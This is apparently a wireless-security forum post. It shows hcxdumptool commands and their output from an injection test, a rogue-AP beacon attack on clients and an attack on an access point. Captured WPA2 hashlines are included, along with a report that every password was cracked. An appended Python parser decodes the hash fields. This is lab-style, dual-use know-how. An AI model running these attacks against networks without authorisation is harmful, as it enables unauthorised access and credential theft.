01-16-2023, 12:36 PM
Testing now ACM36 with stock antennas. First tried injection:
Code:
$ sudo hcxdumptool -i wlan0 --check_injection -c 6
initialization of hcxdumptool 6.2.6 (depending on the capabilities of the device, this may take some time)...
starting antenna test and packet injection test (that can take up to two minutes)...
stage 2 of 2 probing frequency 5865/173 proberesponse 107
packet injection is working on 2.4GHz!
injection ratio: 21% (BEACON: 503 PROBERESPONSE: 107)
your injection ratio is poor - improve your equipment and/or get closer to the target
antenna ratio: 31% (NETWORK: 22 PROBERESPONSE: 7)
your antenna ratio is average, but there is still room for improvement
After that I turned off my AP and ran hcxdumptool with an ESSID list in the beacon:
Code:
sudo hcxdumptool -i wlan0 -o dump.pcapng --enable_status=31 --essidlist=essid --active_beacon
SSID.......: ASK88
MAC_AP.....: 00054fca9e3c (Unknown)
MAC_CLIENT.: a07817ab4970 (Unknown)
VERSION....: 802.1X-2004 (2)
KEY VERSION: WPA2
REPLAYCOUNT: 63804
RC INFO....: ROGUE attack / NC not required
MP M1M2 E2.: challenge
MIC........: fdf1586b39920f78be6265942dcb96e8
HASHLINE...: WPA*02*fdf1586b39920f78be6265942dcb96e8*00054fca9e3c*a07817ab4970*41534b3838*5f163f74b712f513da4d89290b49282e661e1f86f90958873a063de9dd3c0a8d*0203007502010a0010000000000000f93c8b153e17d1c69ff3b457c403d2b9c7ae3efc4fb1e864f38890b333bcaa0ef8fd000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020c00*10
SSID.......: ASK88
MAC_AP.....: 00054fca9e3c (Unknown)
MAC_CLIENT.: dce99422f2a4 (Unknown)
VERSION....: 802.1X-2001 (1)
KEY VERSION: WPA2
REPLAYCOUNT: 63804
RC INFO....: ROGUE attack / NC not required
MP M1M2 E2.: challenge
MIC........: ccaf2a25d20ceb5817fb6707cc8c8ab9
HASHLINE...: WPA*02*ccaf2a25d20ceb5817fb6707cc8c8ab9*00054fca9e3c*dce99422f2a4*41534b3838*5f163f74b712f513da4d89290b49282e661e1f86f90958873a063de9dd3c0a8d*0103007502010a0000000000000000f93c1399badf3e231b14299562944641368fc032a0c91da5441cf8f00a09e9d4abe0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020c00*10
After that I turned on the AP and ran hcxdumptool in standard mode:
Code:
sudo hcxdumptool -i wlan0 -o dump.pcapng --enable_status=31
SSID.......: ASK88
MAC_AP.....: 0024fbc000e1 (Unknown)
MAC_CLIENT.: dce99422f2a4 (Unknown)
VERSION....: 802.1X-2001 (1)
KEY VERSION: WPA2
REPLAYCOUNT: 63129
RC INFO....: ROGUE attack / NC not required
MP M1M2 E2.: challenge
MIC........: 2068dcdb59d1472326a69744223463c5
HASHLINE...: WPA*02*2068dcdb59d1472326a69744223463c5*0024fbc000e1*dce99422f2a4*41534b3838*3df826a2aca69b771ce04743bb5602bb06fcfd6d1f006c04d487847758a78399*0103007502010a0000000000000000f6994458ce666c1df885334f1934042ad574181fc118864d1d90e6af6f3e6103e89f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020c00*10
While attacking clients, I got two hashes. While attacking the AP, I got the AP's one.
From all obtained hashes password was recovered.
Question is what are the benefits of attacking client vs attacking AP?
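How the HASHLINE field in the output above relates to the other status lines (SSID, VERSION, KEY VERSION, REPLAYCOUNT, RC INFO), as an added example that is not part of the original post or of hcxdumptool. It assumes hashcat's published `WPA*02` layout (MIC, MAC_AP, MAC_CLIENT, ESSID, ANONCE, EAPOL, message pair); the function names are hypothetical and the sample line is constructed, with placeholder MACs, MIC and nonce.

```python
import struct

# Key descriptor version: low three bits of the EAPOL-Key "key information" field.
KEY_VERSIONS = {1: "HMAC-MD5/RC4 (WPA1)", 2: "HMAC-SHA1/AES (WPA2)", 3: "AES-128-CMAC"}

def parse_wpa02(line):
    """Split a WPA*02 hash line and decode the fields shown in the status output."""
    parts = line.strip().split("*")
    if len(parts) != 9 or parts[:2] != ["WPA", "02"]:
        raise ValueError("not a WPA*02 (EAPOL) hash line")
    mic, mac_ap, mac_client, essid, anonce, eapol_hex, mp_hex = parts[2:]
    eapol = bytes.fromhex(eapol_hex)
    if len(eapol) < 17:
        raise ValueError("EAPOL frame too short for an EAPOL-Key header")
    # 802.1X header (version, type, body length), then descriptor type,
    # key information, key length and the 8-byte replay counter.
    version, ptype, _blen, _desc, key_info, _klen, replay = struct.unpack(
        ">BBHBHHQ", eapol[:17])
    if ptype != 3:
        raise ValueError("EAPOL packet is not an EAPOL-Key frame")
    mp = int(mp_hex, 16)
    return {
        "ssid": bytes.fromhex(essid).decode("utf-8", errors="replace"),
        "mac_ap": mac_ap,
        "mac_client": mac_client,
        "mic": mic,
        "anonce": anonce,
        "eapol_version": version,          # 1 = 802.1X-2001, 2 = 802.1X-2004
        "key_version": KEY_VERSIONS.get(key_info & 0x07, "unknown"),
        "replaycount": replay,
        "m1m2_challenge": (mp & 0x07) == 0,  # M1+M2, EAPOL taken from M2
        "ap_less": bool(mp & 0x10),          # M2 answered an M1 not sent by a real AP
    }

def build_sample():
    """Constructed hash line: placeholder MACs/MIC/nonce, 121-byte zero-padded M2."""
    eapol = struct.pack(">BBHBHHQ", 1, 3, 0x75, 2, 0x010A, 0, 63804) + bytes(104)
    return "*".join(["WPA", "02", "00" * 16, "020000000001", "020000000002",
                     b"LABNET".hex(), "ab" * 32, eapol.hex(), "10"])

if __name__ == "__main__":
    for key, value in parse_wpa02(build_sample()).items():
        print(f"{key:15} {value}")
```

Run against a capture of your own network, `mac_ap` together with the `ap_less` flag shows whether a client sent its M2 to the real access point or to a transmitter imitating its SSID.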